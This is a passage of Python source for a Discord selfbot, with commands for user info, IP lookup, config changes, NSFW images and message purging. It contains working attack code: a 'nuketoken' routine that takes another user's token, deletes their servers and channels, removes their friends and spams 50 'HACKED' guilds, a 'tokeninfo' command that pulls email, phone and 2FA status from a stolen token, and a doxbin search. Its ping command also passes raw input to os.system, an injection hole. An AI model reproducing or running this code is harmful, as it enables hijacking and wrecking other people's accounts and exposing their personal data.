discord.Embed(title=f"**USER INFO FOR {member}**", color=color) embed.set_thumbnail(url=member.avatar_url) embed.set_footer(text=f"Requested by {ctx.author}") embed.add_field(name="ID:", value=member.id) embed.add_field(name="Display Name:", value=member.display_name) embed.add_field(name="Created Account On:", value=member.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC")) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: # doesnt work properly errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ping(ctx, ip = None): await ctx.message.delete() commandprint("Command 'ping' has been used by " + bot.user.name) if ip is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a ip \n" "Example: " + prefix + "ping 1.1.1.1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: response = os.system("ping -c 1 " + ip) if response == 0: embed = discord.Embed(title="**PINGING**", description=f"{ip} is online", color=color) else: embed = discord.Embed(title="**PINGING**", description=f"{ip} is offline", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid IP ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid IP \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) # TOKEN NUKING guildsIds = [] friendsIds = [] channelIds = [] class Login(discord.Client): async def on_connect(self): for g in self.guilds: guildsIds.append(g.id) for f in self.user.friends: friendsIds.append(f.id) for c in self.private_channels: channelIds.append(c.id) await self.logout() def run(self, token): try: super().run(token, bot=False) except Exception as e: tokenprint("exception:" + str(e)) def tokenFuck(targettoken): headers = {'Authorization': targettoken} tokenprint("Attempting to Nuke " + targettoken) try: for guild in guildsIds: requests.delete(f'https://discord.com/api/v8/users/@me/guilds/{guild}', headers=headers) tokenprint(" Deleting guilds...") except Exception as e: tokenprint(f"Unable to delete guilds... {e}") try: for id in channelIds: requests.delete(f'https://discord.com/api/v8/channels/{id}', headers=headers) except Exception as e: tokenprint(f"Unable to delete channels... {e}") try: for friend in friendsIds: requests.delete(f'https://discord.com/api/v6/users/@me/relationships/{friend}', headers=headers) tokenprint(" Removing friends...") except Exception as e: tokenprint(f"Unable to remove friends... {e}") try: for i in range(50): payload = {'name': f'HACKED {i}', 'region': 'europe', 'icon': None, 'channels': None} requests.post('https://discord.com/api/v6/guilds', headers=headers, json=payload) except: tokenprint("Unable to create guilds...") @bot.command() async def nuketoken(ctx, targettoken = None): await ctx.message.delete() threads = 90 commandprint("Command 'nuketoken' has been used by " + bot.user.name) if targettoken is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a token \n" "Example: " + prefix + "nuketoken token", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title="**NUKING TOKEN**", description="Check console or webhooks for progress", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) Login().run(targettoken) if threading.active_count() < int(threads): t = threading.Thread(target=tokenFuck, args=(targettoken,)) t.start() except Exception as error: errorprint("Exception ' {0} ', Invalid token ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid token \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def tokeninfo(ctx, tokeninfotoken = None): await ctx.message.delete() commandprint("Command 'tokeninfo' has been used by " + bot.user.name) if tokeninfotoken is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a token \n" "Example: " + prefix + "tokeninfo token", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: headers = {'Authorization': tokeninfotoken, 'Content-Type': 'application/json'} r = requests.get('https://discord.com/api/v6/users/@me', headers=headers) if r.status_code == 200: userName = r.json()['username'] + '#' + r.json()['discriminator'] userID = r.json()['id'] phone = r.json()['phone'] email = r.json()['email'] mfa = r.json()['mfa_enabled'] embed = discord.Embed(title="**TOKEN INFORMATION**", color=color) embed.add_field(name=f"**USER ID**", value=f"{userID}", inline=False) embed.add_field(name=f"**USER NAME**", value=f"{userName}", inline=False) embed.add_field(name=f"**2 FACTOR**", value=f"{mfa}", inline=False) embed.add_field(name=f"**EMAIL**", value=f"{email}", inline=False) embed.add_field(name=f"**PHONE NUMBER**", value=f"{phone if phone else 'N/A'}", inline=False) embed.add_field(name=f"**TOKEN**", value=f"{tokeninfotoken}", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid token ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid token \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def yourtoken(ctx): await ctx.message.delete() commandprint("Command 'yourtoken' has been used by " + bot.user.name) try: embed = discord.Embed(title="**YOUR TOKEN**", description=token, color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid token ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid token \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=["phub"]) async def pornhub(ctx, *, search = None): await ctx.message.delete() commandprint("Command 'pornhub' has been used by " + bot.user.name) if search is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a search inquiry \n" "Example: " + prefix + "pornhub monkey", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: embed=discord.Embed(title="**PORNHUB**", color=color) embed.set_thumbnail(url="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f1/Pornhub-logo.svg/512px-Pornhub-logo.svg.png") embed.add_field(name="URL: ", value=f"https://www.pornhub.com/video/search?search={search}", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command(aliases=["db"]) async def doxbin(ctx, *, search = None): await ctx.message.delete() commandprint("Command 'doxbin' has been used by " + bot.user.name) if search is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a search inquiry \n" "Example: " + prefix + "doxbin culur", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: embed=discord.Embed(title="**DOXBIN**", color=color) embed.set_thumbnail(url="https://upload.wikimedia.org/wikipedia/commons/2/27/Brian_krebs.png") embed.add_field(name="URL: ", value=f"https://doxbin.org/search/{search}", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command(aliases=["yt"]) async def youtube(ctx, *, search = None): await ctx.message.delete() commandprint("Command 'youtube' has been used by " + bot.user.name) if search is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a search inquiry \n" "Example: " + prefix + "youtube man vapes cum", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: embed=discord.Embed(title="**YOUTUBE**", color=color) embed.set_thumbnail(url="https://upload.wikimedia.org/wikipedia/commons/thumb/9/94/YouTube_social_white_circle_%28pink%29.svg/120px-YouTube_social_white_circle_%28pink%29.svg.png") embed.add_field(name="URL: ", value=f"https://www.youtube.com/results?search_query={search}", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command(aliases=['corona']) async def covid(ctx): await ctx.message.delete() commandprint("Command 'covid' has been used by " + bot.user.name) r = requests.get("https://api.covid19api.com/world/total") res = r.json() totalc = 'TotalConfirmed' totald = 'TotalDeaths' totalr = 'TotalRecovered' embed = discord.Embed(title='Updated Just Now:', description=f"Deaths | **{res[totald]}**\nConfirmed | **{res[totalc]}**\nRecovered | **{res[totalr]}**") # create embed embed.colour = color embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def emojisteal(ctx): await ctx.message.delete() commandprint("Command 'emojisteal' has been used by " + bot.user.name) try: emoji = discord.Emoji folderName = 'Emojis\\' + ctx.guild.name.translate({ord(c): None for c in '/<>:"\\|?*'}) if not os.path.exists(folderName): os.makedirs(folderName) for emoji in ctx.guild.emojis: emoji_image = await emoji.url.read() if emoji.animated: fileName = folderName + '/' + emoji.name + ".gif" else: fileName = folderName + '/' + emoji.name + ".png" with open(fileName, 'wb') as outFile: req = urllib.request.Request(emoji.url, headers={'User-Agent': 'Mozilla/5.0'}) data = urllib.request.urlopen(req).read() outFile.write(data) eventprint("User has downloaded a servers emojis ") em = discord.Embed(title="Successfully downloaded all emojis", description="Please contact a host to receive your data", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', command can only be used within servers".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Couldn't gather emojis \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def hypesquad(ctx, house = None): global payload await ctx.message.delete() commandprint("Command 'hypesquad' has been used by " + bot.user.name) if house is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a house \n" "Example: " + prefix + "hypesquad brilliance", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: request = requests.session() headers = { 'Authorization': token, 'Content-type': 'application/json' } if house == "bravery": payload = {'house_id': 1} elif house == "brilliance": payload = {'house_id': 2} elif house == "balance": payload = {'house_id': 3} try: request.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload) # untested, may not work because of global statement eventprint("HypeSquad has been changed to " + house) em = discord.Embed(title="**HYPESQUAD CHANGED**", description="Your hypesquad has been changed to " + house, color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Failed to contact discord api".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Failed to contact discord api \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def exportfriends(ctx): await ctx.message.delete() commandprint("Command 'exportfriends' has been used by " + bot.user.name) try: for user in bot.user.friends: print(user.name+"#"+user.discriminator) eventprint("Friends exported") embed = discord.Embed(title="", color=color) embed.add_field(name="**FRIENDS LIST EXPORTED**", value="Results printed to console, please contact a host to receive your data.", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not fetch friends ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not fetch friends \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def restart(ctx): await ctx.message.delete() commandprint("Command 'restart' has been used by " + bot.user.name) try: eventprint(f"Restarting {name}... ") embed = discord.Embed(title=f"**Restarting {name}...**", description="This will take up to 10 seconds, if your bot does not restart notify an admin.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) restartbot() except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setprefix(ctx, newprefix = None): await ctx.message.delete() commandprint("Command 'setprefix' has been used by " + bot.user.name) if newprefix is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a prefix \n" "Example: " + prefix + "setprefix /", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("prefix")] = newprefix with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Prefix has been set to " + newprefix) embed = discord.Embed(title="PREFIX CHANGED", description=f"Prefix is now '{newprefix}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setemoji(ctx, *, newemoji = None): await ctx.message.delete() commandprint("Command 'setemoji' has been used by " + bot.user.name) if newemoji is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a emoji \n" "Example: " + prefix + "setemoji <3", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("emoji")] = newemoji with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Emoji has been set to " + newemoji) embed = discord.Embed(title="EMOJI CHANGED", description=f"Emoji is now '{newemoji}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def settitle(ctx, *, newtitle = None): await ctx.message.delete() commandprint("Command 'settitle' has been used by " + bot.user.name) if newtitle is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a title \n" "Example: " + prefix + "settitle flairings is good dev", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("title")] = newtitle with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Title has been set to " + newtitle) embed = discord.Embed(title="TITLE CHANGED", description=f"Title is now '{newtitle}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setstreamurl(ctx, newstreamurl = None): await ctx.message.delete() commandprint("Command 'setstreamurl' has been used by " + bot.user.name) if newstreamurl is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a streamurl \n" "Example: " + prefix + "setstreamurl https://twitch.tv/god", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("stream-url")] = newstreamurl with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("StreamURL has been set to " + newstreamurl) embed = discord.Embed(title="STREAM-URL CHANGED", description=f"Stream-URL is now '{newstreamurl}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['toggledml']) async def toggledeletedmessagelogger(ctx, *, boolean = None): await ctx.message.delete() commandprint("Command 'toggledeletedmessagelogger' has been used by " + bot.user.name) if boolean is None: embed = discord.Embed(title="DELETED-MESSAGE-LOGGER", description=f"You must provide a boolean, 'true' or 'false', no capitals.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) if boolean == "true": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("deleted-message-logger")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Deleted message logger has been set to " + boolean) embed = discord.Embed(title="DELETED-MESSAGE-LOGGER CHANGED", description=f"Deleted-message-logger is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) elif boolean == "false": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("deleted-message-logger")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Deleted message logger has been set to " + boolean) embed = discord.Embed(title="DELETED-MESSAGE-LOGGER CHANGED", description=f"Deleted-message-logger is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['togglegs']) async def togglegiveawaysniper(ctx, *, boolean = None): await ctx.message.delete() commandprint("Command 'togglegiveawaysniper' has been used by " + bot.user.name) if boolean is None: embed = discord.Embed(title="GIVEAWAY-SNIPER", description=f"You must provide a boolean, 'true' or 'false', no capitals.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) if boolean == "true": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("giveaway-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Giveaway sniper has been set to " + boolean) embed = discord.Embed(title="GIVEAWAY-SNIPER CHANGED", description=f"Giveaway-Sniper is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) elif boolean == "false": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("giveaway-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Giveaway sniper has been set to " + boolean) embed = discord.Embed(title="GIVEAWAY-SNIPER CHANGED", description=f"Giveaway-Sniper is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['togglens']) async def togglenitrosniper(ctx, *, boolean = None): await ctx.message.delete() commandprint("Command 'togglenitrosniper' has been used by " + bot.user.name) if boolean is None: embed = discord.Embed(title="NITRO-SNIPER", description=f"You must provide a boolean, 'true' or 'false', no capitals.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) if boolean == "true": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("nitro-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Nitro sniper has been set to " + boolean) embed = discord.Embed(title="NITRO-SNIPER CHANGED", description=f"Nitro-Sniper is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) elif boolean == "false": try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("nitro-sniper")] = boolean with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Nitro sniper has been set to " + boolean) embed = discord.Embed(title="NITRO-SNIPER CHANGED", description=f"Nitro-Sniper is now '{boolean}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format( error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setgmailaccount(ctx, *, newgmail = None): await ctx.message.delete() commandprint("Command 'setgmailaccount' has been used by " + bot.user.name) if newgmail is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a gmail \n" "Example: " + prefix + "setgmailaccount mars@gmail.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("gmail-account")] = newgmail with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Gmail account has been set to " + newgmail) embed = discord.Embed(title="GMAIL-ACCOUNT CHANGED", description=f"Gmail-Account is now '{newgmail}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setgmailpassword(ctx, *, newgmailpassword = None): await ctx.message.delete() commandprint("Command 'setgmailpassword' has been used by " + bot.user.name) if newgmailpassword is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a gmail password \n" "Example: " + prefix + "setgmailpassword qwerty123!", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("gmail-password")] = newgmailpassword with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Gmail account password has been set to " + newgmailpassword) embed = discord.Embed(title="GMAIL-PASSWORD CHANGED", description=f"Gmail password has been changed. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def lesbian(ctx): await ctx.message.delete() commandprint("Command 'lesbian' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/les") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def lewd(ctx): await ctx.message.delete() commandprint("Command 'lewd' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def blowjob(ctx): await ctx.message.delete() commandprint("Command 'blowjob' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/blowjob") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def tits(ctx): await ctx.message.delete() commandprint("Command 'tits' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/tits") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def boobs(ctx): await ctx.message.delete() commandprint("Command 'boobs' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/boobs") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def hentai(ctx): await ctx.message.delete() commandprint("Command 'hentai' has been used by " + bot.user.name) r = requests.get("https://nekos.life/api/v2/img/Random_hentai_gif") res = r.json() embed = discord.Embed(color=color) embed.set_image(url=res['url']) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def tinyurl(ctx, *, link = None): await ctx.message.delete() commandprint("Command 'tinyurl' has been used by " + bot.user.name) if link is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a link \n" "Example: " + prefix + "tinyurl https://adf.ly/393jf8f8s9ghn", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get(f'http://tinyurl.com/api-create.php?url={link}').text embed = discord.Embed(title="**LINK SHORTENED**", description=f"Your shortened link is {r}", color=color) embed = discord.Embed(color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not contact API / invalid link ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not contact API / invalid link \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(name='first-message', aliases=['firstmsg', 'firstmessage']) async def _first_message(ctx, channel: discord.TextChannel = None): await ctx.message.delete() commandprint("Command 'firstmessage' has been used by " + bot.user.name) try: if channel is None: channel = ctx.channel first_message = (await channel.history(limit=1, oldest_first=True).flatten())[0] embed = discord.Embed(title="**FIRST MESSAGE FOUND**", color=color) embed.add_field(name="click to jump \n", value=f"[CLICK]({first_message.jump_url})") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not find first message".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not find first message \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def topic(ctx): await ctx.message.delete() commandprint("Command 'topic' has been used by " + bot.user.name) try: r = requests.get('https://www.conversationstarters.com/generator.php').content soup = bs4(r, 'html.parser') topic = soup.find(id="random").text await ctx.send(topic) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Error unknown. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def logout(ctx): await ctx.message.delete() commandprint("Command 'logout' has been used by " + bot.user.name) try: embed = discord.Embed(title="", description="", color=color, ) embed.add_field(name="**LOGGING OUT**", value="Contact your host to re-enable the bot", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) eventprint("Logging out") await bot.logout() except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(pass_context=True) async def uptime(ctx): await ctx.message.delete() commandprint("Command 'uptime' has been used by " + bot.user.name) try: currenttime = time.time() difference = int(round(currenttime - start_time)) text = str(datetime.timedelta(seconds=difference)) embed = discord.Embed(title="**UPTIME**", description=text, colour=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Error unknown. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def cl(ctx, amount:int = None): await ctx.message.delete() if amount is None: commandprint("Command 'cl' has been used by " + bot.user.name + " but did not specify an integer so the command has been canceled.") embed = discord.Embed(colour=errorcolor) embed.add_field(name="Error:", value="Please specify an integer") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: commandprint("Command 'cl' has been used by " + bot.user.name) async for msg in ctx.channel.history(limit=amount): if msg.author == bot.user: try: await msg.delete() except Exception as x: pass @bot.command(pass_context=True) async def admincl(ctx, limit: int = None): await ctx.message.delete() commandprint("Command 'admincl' has been used by " + bot.user.name) if limit is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a limit \n" "Example: " + prefix + "admincl 10", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: await ctx.channel.purge(limit=limit) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def iplookup(ctx, ipaddress = None): await ctx.message.delete() commandprint("Command 'iplookup' has been used by " + bot.user.name) if ipaddress is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a ip \n" "Example: " + prefix + "iplookup 1.1.1.1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: p = requests.post('http://ip-api.com/json/' + ipaddress) if '"status":"success"' in p.text: embed = discord.Embed(title=f" __**INFO**__ ", description=f"IP | **{ipaddress}**\n" f" Country | **{p.json()['country']}**\n" f" Country Code | **{p.json()['countryCode']}**\n" f" Region | **{p.json()['region']}**\n" f" Region Name | **{p.json()['regionName']}**\n" f" City | **{p.json()['city']}**\n" f" Timezone | **{p.json()['timezone']}**\n" f" Zip | **{p.json()['zip']}**\n" f" ISP | **{p.json()['isp']}**", color=color, footer=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: errorprint("Exception ' {0} ', Invalid IP") em = 